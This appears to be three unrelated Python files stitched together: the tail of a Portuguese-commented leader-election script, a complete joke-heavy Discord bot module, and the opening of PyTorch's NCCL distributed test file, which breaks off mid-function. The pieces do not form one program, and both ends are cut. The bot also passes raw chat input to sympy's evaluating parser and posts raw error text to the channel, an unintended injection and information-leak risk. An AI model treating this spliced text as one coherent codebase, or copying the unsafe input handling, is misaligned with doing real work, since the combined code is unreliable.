print("maxId: ", maxId)
end_election(id_eleicao_atual, str(maxId))
else:
if dados is None:
dados = [myId]
else:
dados.append(myId)
peers = glPeers.copy()
peers.sort(key=lambda x: int(x.get("id")))
print(peers)
for peer in cycle(peers):
# if peer["id"] == myId:
# continue
res = requests.post(
f"{peer['url']}eleicao", json={"id": id_eleicao_atual, "dados": dados}
)
if res.status_code == 200:
print(f"Enviado eleicao para {peer['id']}({peer['nome']})")
break
else:
log(
"Error",
f"Erro ao enviar dados para eleicao a {peer['url']}",
f"Status code: {res.status_code}",
)
print(f"Erro ao enviar dados para eleicao a {peer['url']}")
def eleicao_bully(id_eleicao_atual: str):
res_count = 0
peers = glPeers.copy()
peers.sort(key=lambda x: int(x.get("id")))
print(peers)
for peer in peers:
if peer["id"] == myId:
continue
elif int(peer["id"]) < int(myId):
break
else:
res = requests.post(
f"{peer['url']}eleicao",
json={"id": id_eleicao_atual, "dados": []},
)
if res.status_code == 200:
print(f"Enviado eleicao para {peer['id']}({peer['nome']})")
res_count += 1
else:
log(
"Error",
f"Erro ao enviar dados para eleicao a {peer['url']}",
f"Status code: {res.status_code}",
)
print(f"Erro ao enviar dados para eleicao a {peer['url']}")
if res_count == 0:
end_election(id_eleicao_atual, myId)
def end_election(id_eleicao_atual: str, id: str):
message = (
"Look at me! I'm the boss now"
if id == myId
else f"Novo coordenador eleito: {id}"
)
log("Success", f"Eleicao {id_eleicao_atual} finalizada. Coordenador: {id}", message)
print(f"Eleicao {id_eleicao_atual} finalizada. Coordenador: {id}")
for peer in glPeers:
if peer["id"] == myId:
continue
requests.post(
f"{peer['url']}eleicao/coordenador",
json={"id_eleicao": id_eleicao_atual, "coordenador": id},
)
coordenador.update(
{
"coordenador": id == myId,
"coordenador_atual": id,
}
)
eleicoes.discard(id_eleicao_atual)
class Periodic:
def __init__(self, func, time):
self.func = func
self.time = time
self.is_started = False
self._task = None
async def start(self):
if not self.is_started:
self.is_started = True
# Start task to call func periodically:
self._task = asyncio.ensure_future(self._run())
async def stop(self):
if self.is_started:
self.is_started = False
# Stop task and await it stopped:
self._task.cancel()
with suppress(asyncio.CancelledError):
await self._task
async def _run(self):
while True:
await asyncio.sleep(self.time)
self.func()
def check_coordenador():
if glInfo.status == "online":
if coordenador.get("coordenador_atual") == "":
log("Attention", "Coordenador nao identificado", "Iniciando nova eleicao")
eleicao("")
return
if coordenador.get("coordenador") is False:
for peer in glPeers:
if peer.get("id") == coordenador.get("coordenador_atual"):
res = requests.get(f"{peer.get('url')}info")
if res.status_code != 200 or res.json().get("status") == "offline":
n = random.randint(5, 10)
time.sleep(n)
log("Attention", "Coordenador offline", "Iniciando nova eleicao")
eleicao("")
if __name__ == "__main__":
main()
|
function.py
|
import asyncio
import json
import sys
import threading
import discord
import numpy as np
import requests
import sympy
from discord import File
from PIL import Image
from sympy import S, latex, preview
from sympy.core.numbers import Float as symFloat
from sympy.core.numbers import Integer as symInt
from sympy.parsing.latex import parse_latex
from sympy.plotting.plot import Plot as symPlot
# async def reminder(timer_len):
def schedule_thread(myBot):
while True:
myBot.reportStatus()
return
def check_multiples(msg):
"""
Check how many dice are being asked to be thrown
Parameters:
msg - discord.client.message object storing the received message
returns number of dice thrown
"""
# Reverses String Before d
msg = msg.strip()
msg = msg[::-1]
i = 0
while i < len(msg) and msg[i].isdigit():
i += 1
if i == 0:
return -1 # If No Given Numbers Return -1
else:
# Reverses Again After Finding When the Numbers Stop
number_of_dice = int(msg[0:i][::-1])
return number_of_dice
def extract_names(name):
"""
Function to separate discord username from id
Parameters:
name - discord.client.author object
returns Username and UserID
"""
if type(name) != "string":
username = str(name)
username = username.split("#", 1)
user = username[0]
id = username[1]
return user, id
async def coin_flip(myBot, message):
"""
Has the bot flip a coin and send the results.
Responds to Flip and Coin in the same sentence
Parameters:
myBot - Coderbot Class Found in bot.py
message - discord.client.message object storing the received message
returns 1 on proper execution
"""
try:
if (
"!coin" in message.content.lower().strip()
or "!flip" in message.content.lower().strip()
):
if np.random.randint(0, high=2) == 0:
await message.channel.send("Heads")
else:
await message.channel.send("Tails")
except Exception as inst:
return await fuckup(inst, message)
return 1
async def roll_dice(myBot, message):
"""
Rolls a die based on the message input
Parameters:
myBot - Coderbot Class Found in bot.py
message - discord.client.message object storing the received message
return 1 on proper execution
"""
try:
stripped_msg = message.content.lower().strip()
if (
"roll:" in stripped_msg
or "!roll" in stripped_msg
or "!dice" in stripped_msg
or "!die" in stripped_msg
) and "d" in stripped_msg:
msg = message.content.lower().split("d", 1)
start = msg[1]
die_count = check_multiples(msg[0])
if die_count == -1:
die_count = 1
faces = ""
for i in start:
if i.isdigit():
faces += i
if faces == "":
await message.channel.send("Try Something Else Plz Dummy!")
return
faces = int(faces)
if faces <= 0 or die_count > 100:
await message.channel.send("Try Something Else Plz Dummy!")
return
else:
results = [
np.random.randint(1, high=(faces + 1)) for _ in range(die_count)
]
if len(results) > 1:
output = "Total Roll: " + str(die_count) + "d" + str(sum(results))
for i, result in enumerate(results):
output += "\nRoll " + str(i + 1) + ": 1d" + str(result)
if result == 1 or result == faces:
await message.add_reaction("<:thinkban:776586606358167602>")
else:
output = str(die_count) + "d" + str(results[0])
if die_count == sum(results) or die_count * faces == sum(results):
await message.add_reaction("<:thinkban:776586606358167602>")
await message.channel.send(output)
except Exception as inst:
return await fuckup(inst, message)
return 1
async def ban(message):
if (
len(message.mentions) == 1
and "coderbot" == extract_names(message.mentions[0])[0].lower()
):
if not message.author.top_role.name.lower() == "snail queen":
await message.channel.send(
"... Uhh, No thank you? Enjoy your new Username for a Little While Ya Lemon 🤬!"
)
og_name = str(message.author.display_name)
if og_name is None:
og_name = message.author.name
if len(og_name) < 24:
await message.author.edit(nick="Ye Ol' Tart " + og_name)
else:
await message.author.edit(nick="Ye Ol' Lemon")
await asyncio.sleep(10)
await message.channel.send(
"Okay... Maybe that a was a bit far. I'm Sowwy 😔"
)
await message.author.edit(nick=og_name)
else:
await message.channel.send("Uuurgh, you are too powerful to be stopped!")
return
elif len(message.mentions) == 1:
member = message.mentions[0]
if member.top_role.name.lower() == "snail queen":
await message.channel.send("Urg!!! They are too powerful to ban!")
og_name = member.nick # extract_names(member)[0]
if og_name is None:
og_name = member.name
if type(message.guild.get_member(member.id)) is not None:
await message.channel.send(
"OOPSIE WOOPSIE!! Uwu Did Someone make a fucky wucky!?! A wittle fucko boingo!? Better be more Cawreful! Enjoy the Nickname for a little while Ye Ol' Tart {0} ;3!".format(
extract_names(member)[0]
)
)
if message.guild.get_member(member.id) is not None:
if len(og_name) < 24:
await message.guild.get_member(member.id).edit(
nick="Ye Ol' Tart " + og_name
)
else:
await message.guild.get_member(member.id).edit(nick="Ye Ol' Lemon")
await asyncio.sleep(60)
await message.channel.send("Okay Ban-Time is Uppers :3")
await message.guild.get_member(member.id).edit(nick=og_name)
else:
await message.channel.send(
"Umm, Sorry technical difficulties! Are you shore that person exists :3?"
)
return
else:
editedStr = ""
for i, user in enumerate(message.mentions):
if extract_names(user)[0].lower() == "coderbot":
continue
if i != (len(message.mentions) - 1):
editedStr += str(extract_names(user)[0]) + ", "
else:
editedStr += "or " + str(extract_names(user)[0])
await message.channel.send(
"```Sigh... Okay, guess it's time to drop the ban-hammer. Whose wants this big ol' hammer first :3? {0}, UwU <3<3<3<3 ;3;3;3;3 ????```".format(
editedStr
)
)
for member in message.mentions:
if extract_names(member)[0].lower() == "coderbot":
continue
if (
message.guild.get_member(member.id) is not None
and not message.guild.get_member(member.id).top_role.name.lower()
== "snail queen"
):
og_name = message.guild.get_member(member.id).nick
await message.guild.get_member(member.id).edit(
nick="Ye Ol' Tart " + og_name
)
await asyncio.sleep(60)
await message.channel.send("Okay, Ban Time Uppers :3")
await message.guild.get_member(member.id).edit(nick=og_name)
async def pogchamp(message):
if (
len(message.mentions) == 1
and "coderbot" == extract_names(message.mentions[0])[0].lower()
):
output = (
"... Umm, sure I guess I can be my own little Pogchamp, you bully! :sob:"
)
elif len(message.mentions) == 1:
output = '```System.out.println("Sigh... Okay, I guess you can be my little Pogchamp. {0}, Come here")```'.format(
extract_names(message.mentions[0])[0]
)
else:
editedStr = ""
for i, user in enumerate(message.mentions):
if extract_names(user)[0].lower() == "coderbot":
continue
if i != (len(message.mentions) - 1):
editedStr += str(extract_names(user)[0]) + ", "
else:
editedStr += "and " + str(extract_names(user)[0])
output = '```System.out.println("Sigh... Okay, I guess you can be my little Pogchamps. {0}, Come here")```'.format(
editedStr
)
# Output String is Built in the Conditionals Above and Sent
await message.channel.send(output)
async def evalMath(message, expression, isLatex=False):
try:
# take out backticks
if "`" in expression:
expression = expression.replace("`", "")
if isLatex:
r = S(parse_latex(expression))
else:
r = S(expression)
preview(r, viewer="file", filename="../imgs/output.png")
# resize image
baseheight = 80
img = Image.open("../imgs/output.png")
hpercent = baseheight / float(img.size[1])
wsize = int((float(img.size[0]) * float(hpercent)))
img = img.resize((wsize, baseheight), Image.ANTIALIAS)
img.save("../imgs/output.png")
# send Image
lx = latex(r)
if isLatex:
msg = "Expression: `{}`".format(parse_latex(expression))
else:
msg = "Latex: `{}`".format(lx)
if isinstance(r, symInt) or isinstance(r, symFloat):
approx = r.evalf()
msg = "{}\n`ans = {:.10f}`".format(msg, approx)
await message.channel.send(msg, file=File("../imgs/output.png"))
elif isinstance(r, symPlot):
r.save("../imgs/fig")
await message.channel.send(
msg, files=[File("../imgs/fig.png"), File("../imgs/output.png")]
)
elif isinstance(r, tuple) or isinstance(r, list):
new_nums = []
for i in r:
if isinstance(r, symInt):
new_nums.append(r.evalf())
if len(new_nums) == len(r):
list_msg = "["
for i in new_nums:
list_msg = "{},{:.10f}".format(list_msg, i)
list_msg = list_msg[:-1] + "]"
msg = "{}\n`ans = {}`".format(msg, list_msg)
await message.channel.send(msg, file=File("../imgs/output.png"))
else:
await message.channel.send(msg, file=File("../imgs/output.png"))
except Exception as inst:
return await fuckup(inst, message)
async def dialogue_handler(myBot, message):
"""
Handles dialogue responses for bot
Parameters:
myBot - Coderbot Class Found in bot.py
message - discord.client.message object being responded to
returns 1 on proper execution
"""
try:
# the bot can't react to its own commands
# mostly useful with the help command
if message.author == "CoderBot#9778":
return
if "69" in message.content.lower():
await message.channel.send("Nice")
# Bad Bot and Good Bot Messages With Live Updates to Statistics.json
if "bad bot" in message.content.lower():
await good_bot(False, message)
return
elif "good bot" in message.content.lower():
await good_bot(True, message)
return
# Magic 8ball.
if "!8ball" in message.content.lower():
await eightball(message)
return
if "!apiball" in message.content.lower():
await apiball(message)
return
if "!help" in message.content.lower():
await displayHelp(message)
return
# Ban Commentary
if "!ban" in message.content.lower() and len(message.mentions) == 0:
await message.channel.send(
"Umumu, I see you have chosen... Banishment "
+ extract_names(message.author)[0]
+ "!! Bai Bai!"
)
await asyncio.sleep(5)
await message.channel.send("... Juuuuuuusssst Kidding 😜!!!")
return
if message.content.startswith("!wiki "):
wikiName = message.content[6:]
await getWikiSummary(message, wikiName)
return
if message.content.startswith("!math "):
expression = message.content[6:]
await evalMath(message, expression)
return
if message.content.startswith("!matex "):
expression = message.content[6:]
await evalMath(message, expression, isLatex=True)
return
# if "!reminder" in message.content.lower():
# threading.Thread(target=f.schedule_thread, args=(myBot,)).start()
# Checks Mentions for Individual/Group Messages
if len(message.mentions) > 0:
for name in message.mentions:
if (
"!pogchamp" not in message.content.lower()
and "!ban" not in message.content.lower()
and extract_names(message.author)[0].lower()
== extract_names(name)[0].lower()
):
msg = '```System.out.println("Sigh... Okay, I guess you can be my little Pogchamp. {0}, Come here")```'
await message.channel.send(
msg.format(extract_names(message.author)[0])
)
return
if (
"!ban" in message.content.lower()
and "pogchamp" in message.content.lower()
):
await message.channel.send(
"STOP, I'LL NEVER BAN MY LITTLE POGCHAMPS!!! YOU CAN'T MAKE ME 😖!"
)
return
elif "!ban" in message.content.lower():
await ban(message)
return
elif "!pogchamp" in message.content.lower():
await pogchamp(message)
return
except Exception as inst:
return await fuckup(inst, message)
return 1
async def reaction_handler(myBot, message):
"""
Similar to dialogue_handler, adds reaction emotes to certain messages
Parameters:
myBot - Coderbot Class Found in bot.py
message - discord.client.message object being responded to
returns 1 for correct
"""
try:
if str(message.author) == "Mat#5553" and np.random.randint(1, 21) == 1:
await message.add_reaction("<:thinkban:776586606358167602>")
if str(message.author) == "PokeProfRob#2670" and np.random.randint(1, 21) == 1:
await message.add_reaction("<:mat:792252631765483520>")
if message.content.lower().startswith(
"poll:"
) or message.content.lower().startswith("!poll"):
await message.add_reaction("✅")
await message.add_reaction("❌")
except Exception as inst:
return await fuckup(inst, message)
return 1
async def sleeping_protocol(myBot, message):
try:
if myBot.asleep and (
"ohayo" in message.content.lower()
or (
len(message.mentions) > 0
and extract_names(message.mentions[0])[0].lower()
)
== "coderbot"
):
await myBot.awaken()
await message.channel.send("Good Morning Everyone! :heart:")
return
elif not myBot.asleep and (
"oyasumi" in message.content.lower()
or "stop bot" in message.content.lower()
or (
len(message.mentions) > 0
and "good night" in message.content.lower().strip()
and myBot.myID.name in message.mentions
)
):
# and extract_names(message.author)[0].lower() == "yvillia":
await message.channel.send(
"Like totally nighty-nighters everyone! :kissing_heart:"
)
await myBot.oyasumi()
return
else:
return
except Exception as inst:
return await fuckup(inst, message)
return 1
async def good_bot(isGood, message):
"""
Outputs a message depending on whether the user said good bot or bad bot
then log the data in statistics.json
Parameters:
isGood - boolean used to say if the bot is good or not
message - discord.client.message object being responded to
returns 1 for correct
"""
try:
response = ""
dataLog = ""
if isGood:
response = (
"Thank youwo vewwy muwuch! I will continuwue towo dowo my best OwO!"
)
dataLog = "Good Bot"
else:
response = "I am so sowwry! I prowomise towo dowo better UwU!"
dataLog = "Bad Bot"
await message.channel.send(response)
# Statistics JSON File
with open("statistics.json", "r") as stats:
data = json.load(stats)
stats.close()
with open("statistics.json", "w") as stats:
data["Phrases"][dataLog] += 1
json.dump(data, stats)
stats.close()
return 1
except Exception as inst:
return await fuckup(inst, message)
async def eightball(message):
"""
Returns a prophecy based on the hard science of magic8ballism
Parameters:
message - discord.client.message object being responded to
returns 1 upon successful execution
"""
try:
if len(message.content) <= 7:
await message.channel.send("U gotta ask a question dummy!")
return
randNum = np.random.randint(1, 6)
prophecy = getEightBallMessage(randNum)
await message.channel.send(prophecy)
return 1
except Exception as inst:
return await fuckup(inst, message)
async def apiball(message):
"""
Super extra version of 8ball that gets its randomness from a true random number generator
Courtesy of random.org
Parameters:
message - discord.client.message object being responded to
returns 1 upon successful execution
"""
try:
if len(message.content) <= 9:
await message.channel.send("U gotta ask a question dummy!")
return
#Requests 1 random integer between 0-60 from random.org
randomNum = requests.get("https://www.random.org/integers/?num=1&min=0&max=60&col=1&base=10&format=plain&rnd=new")
randomNum = int(randomNum.text) % 6
prophecy = getEightBallMessage(randomNum)
await message.channel.send(prophecy)
return 1
except Exception as inst:
return await fuckup(inst, message)
def getEightBallMessage(randNum):
prophecy = ""
if randNum == 1:
prophecy = "No x3c"
elif randNum == 2:
prophecy = "I don't think sooo >w<"
elif randNum == 3:
prophecy = "Ya uwu"
elif randNum == 4:
prophecy = "Most likely owo"
elif randNum == 5:
prophecy = "I dunno nwn"
else:
prophecy = "Mayb, mayb not :3"
return prophecy
async def getWikiSummary(message, title):
"""
Display the wikipedia article summary of the article with the given title
Parameters:
message - discord.client.message object being responded to
title - string of the wikipedia article title
"""
try:
query = (
"https://en.wikipedia.org/w/api.php?format=json&action=query&prop=extracts&exintro&explaintext&redirects=1&titles="
+ title
)
wikiRequest = requests.get(query)
summaryObject = wikiRequest.json()
if list(summaryObject["query"]["pages"])[0] == "-1":
await message.channel.send(
"I'm sowwy, I couldn't find " + title + " on wikipedia pwq"
)
return 0
# Grab the wiki summary from the JSON object
# this line took forever to figure out
summary = list(summaryObject["query"]["pages"].values())[0]["extract"]
summary = trimTo2K(summary)
await message.channel.send(summary)
# Now for the fucking image
# if it got this far we know the article exists so no need to check for that
imageQuery = (
"https://en.wikipedia.org/w/api.php?action=query&titles="
+ title
+ "&prop=pageimages&format=json&pithumbsize=200"
)
wikiImageRequest = requests.get(imageQuery)
imageSummaryObject = wikiImageRequest.json()
imageURLObject = list(imageSummaryObject["query"]["pages"].values())[0]
if "thumbnail" in imageURLObject.keys():
imageURL = imageURLObject["thumbnail"]["source"]
await message.channel.send(imageURL)
return 1
except Exception as inst:
return await fuckup(inst, message)
async def displayHelp(message):
"""
Displays a list of user executable commands
Parameters:
message - discord.client.message object being responded to
"""
helpMessage = """
Heya! Here's what I can do for you atm uwu
ohayo - wake me up owo
oyasumi - tuck me in o//w//o
!help - display all commands
!roll (or !dice/!die) #d## - roll dice
!flip - flip a coin
!ban @member - Ban somebody >:3
!pogchamp @member - Designate one as being a pog champ
!poll - create a poll
!wiki [article name] - get wikipedia summary of an article
!8ball [text] Answer controversial questions
!math [expression] Check out https://gamma.sympy.org/ for a list of commands
!matex [latex expresion] Do math in the latex format ^-^
[bad bot, good bot] - Rate me :)
"""
await message.channel.send(helpMessage)
return
async def fuckup(inst, message):
"""
Outputs an error that was thrown during the execution of an asynchronous function
Parameters:
inst - The Exception object thrown
returns 0
"""
exc_type, exc_obj, exc_tb = sys.exc_info()
errorMsg = (
"Error "
+ str(type(inst))
+ ": \n"
+ str(inst)
+ "\nLine: "
+ str(exc_tb.tb_lineno)
)
await message.channel.send("```" + errorMsg + "```")
return 0
# The discord message limit is 2000 characters
# This trims a message to the nearest sentence to 2000 characters
def trimTo2K(message):
if len(message) <= 2000:
return message
i = 2000
while i >= 0:
i -= 1
if message[i] == ".":
break
return message[: (i + 1)]
|
test_c10d_nccl.py
|
import copy
import math
import os
import random
import signal
import sys
import tempfile
import threading
import time
from contextlib import contextmanager
from datetime import timedelta
from itertools import product
from unittest import mock
import torch
import torch.distributed as c10d
if not c10d.is_available():
print("c10d not available, skipping tests", file=sys.stderr)
sys.exit(0)
import test_c10d_common
import torch.distributed as dist
import torch.distributed.algorithms.ddp_comm_hooks.default_hooks as default
import torch.distributed.algorithms.ddp_comm_hooks.powerSGD_hook as powerSGD
import torch.nn.functional as F
import torch.testing._internal.common_utils as common
from test_c10d_common import gpus_for_rank, DoubleGpuNet, ConvNet, ModuleForDdpCommHook
from torch import nn
from torch.nn.parallel import DistributedDataParallel
from torch.testing._internal.common_distributed import (
MultiProcessTestCase,
requires_nccl,
requires_nccl_version,
skip_if_lt_x_gpu,
get_timeout,
skip_if_rocm,
with_dist_debug_levels,
with_nccl_blocking_wait,
)
from torch.testing._internal.common_utils import (
IS_WINDOWS,
TestCase,
run_tests,
retry_on_connect_failures,
TEST_WITH_DEV_DBG_ASAN,
TEST_WITH_ROCM,
TEST_WITH_TSAN,
sandcastle_skip,
sandcastle_skip_if,
)
from torch.utils.checkpoint import checkpoint
from torch.distributed.optim import functional_optim_map
if not IS_WINDOWS:
from torch.distributed.optim.functional_sgd import _FunctionalSGD
from torch.distributed.optim.functional_adam import _FunctionalAdam
from torch.distributed.optim.functional_adamw import _FunctionalAdamW
if TEST_WITH_TSAN:
print(
"Skip as TSAN is not fork-safe since we're forking in a multi-threaded environment",
file=sys.stderr,
)
sys.exit(0)
if TEST_WITH_DEV_DBG_ASAN:
print(
"Skip ASAN as torch + multiprocessing spawn have known issues", file=sys.stderr
)
sys.exit(0)
# bfloat16 is only supported by CUDA 11+
BFLOAT16_AVAILABLE = (
torch.cuda.is_available()
and torch.version.cuda is not None
and int(torch.version.cuda.split('.')[0]) >= 11)
class RendezvousEnvTest(TestCase):
@retry_on_connect_failures
@requires_nccl()
@sandcastle_skip_if(
torch.cuda.device_count() == 0, "No GPUs available, skipping test"
)
def test_common_errors(self):
vars = {
"WORLD_SIZE": "1",
"RANK": "0",
"MASTER_ADDR": "127.0.0.1",
"MASTER_PORT": str(common.find_free_port()),
}
class Env(object):
def __init__(self, vars):
self.env_patcher = mock.patch.dict(os.environ, vars, clear=True)
def __enter__(self):
self.env_patcher.start()
def __exit__(self, type, value, traceback):
self.env_patcher.stop()
def without(d, key):
d = d.copy()
d.pop(key)
return d
def withouts(d, keys):
d = d.copy()
for key in keys:
d.pop(key)
return d
with Env(without(vars, "WORLD_SIZE")):
self.assertEqual(None, os.environ.get("WORLD_SIZE"))
with self.assertRaisesRegex(ValueError, "WORLD_SIZE expected"):
gen = c10d.rendezvous("env://")
next(gen)
c10d.init_process_group(backend="nccl", world_size=1)
self.assertEqual(c10d.get_rank(), 0)
self.assertEqual(c10d.get_world_size(), 1)
c10d.destroy_process_group()
with Env(without(vars, "RANK")):
self.assertEqual(None, os.environ.get("RANK"))
with self.assertRaisesRegex(ValueError, "RANK expected"):
gen = c10d.rendezvous("env://")
next(gen)
c10d.init_process_group(backend="nccl", rank=0)
self.assertEqual(c10d.get_rank(), 0)
self.assertEqual(c10d.get_world_size(), 1)
c10d.destroy_process_group()
with Env(withouts(vars, ["RANK", "WORLD_SIZE"])):
self.assertEqual(None, os.environ.get("RANK"))
self.assertEqual(None, os.environ.get("WORLD_SIZE"))
c10d.init_process_group(backend="nccl", rank=0, world_size=1)
self.assertEqual(c10d.get_rank(), 0)
self.assertEqual(c10d.get_world_size(), 1)
c10d.destroy_process_group()
with Env(vars):
c10d.init_process_group(backend="nccl")
self.assertEqual(c10d.get_rank(), 0)
self.assertEqual(c10d.get_world_size(), 1)
c10d.destroy_process_group()
with Env(without(vars, "MASTER_ADDR")):
self.assertEqual(None, os.environ.get("MASTER_ADDR"))
with self.assertRaisesRegex(ValueError, "MASTER_ADDR expected"):
gen = c10d.rendezvous("env://")
next(gen)
with Env(without(vars, "MASTER_PORT")):
self.assertEqual(None, os.environ.get("MASTER_PORT"))
with self.assertRaisesRegex(ValueError, "MASTER_PORT expected"):
gen = c10d.rendezvous("env://")
next(gen)
with Env(without(vars, "WORLD_SIZE")):
self.assertEqual(None, os.environ.get("WORLD_SIZE"))
gen = c10d.rendezvous("env://?world_size={}".format(1))
_, _, size = next(gen)
self.assertEqual(size, 1)
with Env(without(vars, "RANK")):
self.assertEqual(None, os.environ.get("RANK"))
gen = c10d.rendezvous("env://?rank={}".format(0))
_, rank, _ = next(gen)
self.assertEqual(rank, 0)
with Env(withouts(vars, ["RANK", "WORLD_SIZE"])):
self.assertEqual(None, os.environ.get("RANK"))
self.assertEqual(None, os.environ.get("WORLD_SIZE"))
gen = c10d.rendezvous("env://?rank={}&world_size={}".format(0, 1))
_, rank, size = next(gen)
self.assertEqual(rank, 0)
self.assertEqual(size, 1)
class TimeoutTest(test_c10d_common.AbstractTimeoutTest, TestCase):
@requires_nccl()
@retry_on_connect_failures
@sandcastle_skip_if(
torch.cuda.device_count() == 0, "No GPUs available, skipping test"
)
def test_default_store_timeout_nccl(self):
self._test_default_store_timeout("nccl")
class ProcessGroupNCCLNoGPUTest(TestCase):
MAIN_PROCESS_RANK = 0
def setUp(self):
self.rank = self.MAIN_PROCESS_RANK
self.world_size = 1
self.file = tempfile.NamedTemporaryFile(delete=False)
def tearDown(self):
pass
@requires_nccl()
@sandcastle_skip_if(
torch.cuda.device_count() > 0, "GPUs are available, skipping test"
)
def test_init_no_gpus(self):
store = c10d.FileStore(self.file.name, self.world_size)
with self.assertRaisesRegex(
RuntimeError, "ProcessGroupNCCL is only supported with GPUs, no GPUs found!"
):
c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
class ProcessGroupNCCLTest(TestCase):
MAIN_PROCESS_RANK = 0
def setUp(self):
self.rank = self.MAIN_PROCESS_RANK
self.world_size = 1
self.file = tempfile.NamedTemporaryFile(delete=False)
# NCCL_BLOCKING_WAIT overrides NCCL_ASYNC_ERROR_HANDLING hence tests
# that use NCCL_BLOCKING_WAIT will test it as expected.
os.environ["NCCL_ASYNC_ERROR_HANDLING"] = "1"
self.num_gpus = torch.cuda.device_count()
def tearDown(self):
pass
@requires_nccl()
@sandcastle_skip_if(torch.cuda.device_count() < 2, "NCCL test requires 2+ GPUs")
def test_empty_tensors(self):
store = c10d.FileStore(self.file.name, self.world_size)
pg = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
xs = [torch.cuda.FloatTensor([])]
pg.broadcast(xs).wait()
self.assertEqual(0, xs[0].numel())
pg.allreduce(xs).wait()
self.assertEqual(0, xs[0].numel())
pg.reduce(xs).wait()
self.assertEqual(0, xs[0].numel())
ys = [[torch.cuda.FloatTensor([]) for _ in range(self.world_size)]]
pg.allgather(ys, xs).wait()
for y in ys[0]:
self.assertEqual(0, y.numel())
ys = [torch.cuda.FloatTensor([])]
xs = [[torch.cuda.FloatTensor([]) for _ in range(self.world_size)]]
pg.reduce_scatter(ys, xs).wait()
self.assertEqual(0, ys[0].numel())
@requires_nccl()
@sandcastle_skip_if(torch.cuda.device_count() < 2, "NCCL test requires 2+ GPUs")
def test_broadcast_ops(self):
store = c10d.FileStore(self.file.name, self.world_size)
pg = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
def broadcast(xs, rootRank, rootTensor):
opts = c10d.BroadcastOptions()
opts.rootRank = rootRank
opts.rootTensor = rootTensor
work = pg.broadcast(xs, opts)
work.wait()
# for every root tensor
for rt in range(self.num_gpus):
tensors = []
for i in range(self.num_gpus):
tensors.append(torch.tensor([i]).cuda(i))
broadcast(tensors, self.rank, rt)
for i in range(self.num_gpus):
self.assertEqual(tensors[i], tensors[rt])
@requires_nccl()
@sandcastle_skip_if(torch.cuda.device_count() < 2, "NCCL test requires 2+ GPUs")
def test_allreduce_ops(self):
store = c10d.FileStore(self.file.name, self.world_size)
pg = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
def allreduce(tensors, op):
opts = c10d.AllreduceOptions()
opts.reduceOp = op
work = pg.allreduce(tensors, opts)
work.wait()
# Sum
tensors = []
for i in range(self.num_gpus):
tensors.append(torch.tensor([i + 1]).cuda(i))
allreduce(tensors, c10d.ReduceOp.SUM)
for i in range(self.num_gpus):
# TODO(#38095): Replace assertEqualIgnoreType. See issue #38095
self.assertEqualIgnoreType(
torch.tensor([float(self.num_gpus * (self.num_gpus + 1) / 2)]),
tensors[i],
)
# Product
tensors = []
for i in range(self.num_gpus):
tensors.append(torch.tensor([i + 1]).cuda(i))
allreduce(tensors, c10d.ReduceOp.PRODUCT)
for i in range(self.num_gpus):
# TODO(#38095): Replace assertEqualIgnoreType. See issue #38095
self.assertEqualIgnoreType(
torch.tensor([float(math.factorial(self.num_gpus))]), tensors[i]
)
# Min
tensors = []
for i in range(self.num_gpus):
tensors.append(torch.tensor([i + 1]).cuda(i))
allreduce(tensors, c10d.ReduceOp.MIN)
for i in range(self.num_gpus):
# TODO(#38095): Replace assertEqualIgnoreType. See issue #38095
self.assertEqualIgnoreType(torch.tensor([1.0]), tensors[i])
# Max
tensors = []
for i in range(self.num_gpus):
tensors.append(torch.tensor([i + 1]).cuda(i))
allreduce(tensors, c10d.ReduceOp.MAX)
for i in range(self.num_gpus):
self.assertEqual(torch.tensor([self.num_gpus]), tensors[i])
for op in (c10d.ReduceOp.BAND, c10d.ReduceOp.BOR, c10d.ReduceOp.BXOR):
with self.assertRaisesRegex(
RuntimeError, "Cannot use " + str(op) + " with NCCL"
):
allreduce(tensors, op)
@requires_nccl()
@sandcastle_skip_if(torch.cuda.device_count() < 2, "NCCL test requires 2+ GPUs")
def test_reduce_ops(self):
store = c10d.FileStore(self.file.name, self.world_size)
pg = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
def reduce(xs, rootRank, rootTensor, op=None):
opts = c10d.ReduceOptions()
opts.rootRank = rootRank
opts.rootTensor = rootTensor
if op:
opts.reduceOp = op
work = pg.reduce(xs, opts)
work.wait()
# for every root tensor
for rt in range(self.num_gpus):
tensors = []
for i in range(self.num_gpus):
tensors.append(torch.tensor([i + 1]).cuda(i))
reduce(tensors, self.rank, rt)
# TODO(#38095): Replace assertEqualIgnoreType. See issue #38095
self.assertEqualIgnoreType(
torch.tensor([float(self.num_gpus * (self.num_gpus + 1) / 2)]),
tensors[rt],
)
for op in (c10d.ReduceOp.BAND, c10d.ReduceOp.BOR, c10d.ReduceOp.BXOR):
with self.assertRaisesRegex(
RuntimeError, "Cannot use " + str(op) + " with NCCL"
):
reduce(tensors, self.rank, rt, op)
@requires_nccl()
@sandcastle_skip_if(torch.cuda.device_count() < 2, "NCCL test requires 2+ GPUs")
def test_allgather_ops(self):
store = c10d.FileStore(self.file.name, self.world_size)
pg = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
def allgather(output_ts, input_ts):
work = pg.allgather(output_ts, input_ts)
work.wait()
tensors = []
output_ts = [[] for _ in range(self.num_gpus)]
for idx, ls in enumerate(output_ts):
for _ in range(self.world_size * self.num_gpus):
ls.append(torch.tensor([0]).cuda(idx))
for i in range(self.num_gpus):
tensors.append(torch.tensor([i]).cuda(i))
allgather(output_ts, tensors)
# Verification
for device_ts in output_ts:
for s_idx, t in enumerate(device_ts):
self.assertEqual(torch.tensor([s_idx]), t)
@requires_nccl()
@sandcastle_skip_if(torch.cuda.device_count() < 2, "NCCL test requires 2+ GPUs")
def test_allgather_base_ops(self):
store = c10d.FileStore(self.file.name, self.world_size)
pg = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
def allgather_base(output_t, input_t):
work = pg._allgather_base(output_t, input_t)
work.wait()
device_id = self.rank % self.num_gpus
# allgather_base is GPU number agnostic.
# Each rank contribute one tensor regardless of GPU counts
tensor = torch.tensor([self.rank]).cuda(device_id)
output_t = torch.empty((self.world_size), dtype=tensor.dtype).cuda(device_id)
allgather_base(output_t, tensor)
# Verification
self.assertEqual(torch.arange(self.world_size), output_t)
@requires_nccl()
@sandcastle_skip_if(torch.cuda.device_count() < 2, "NCCL test requires 2+ GPUs")
def test_allgather_base_basics(self):
store = c10d.FileStore(self.file.name, self.world_size)
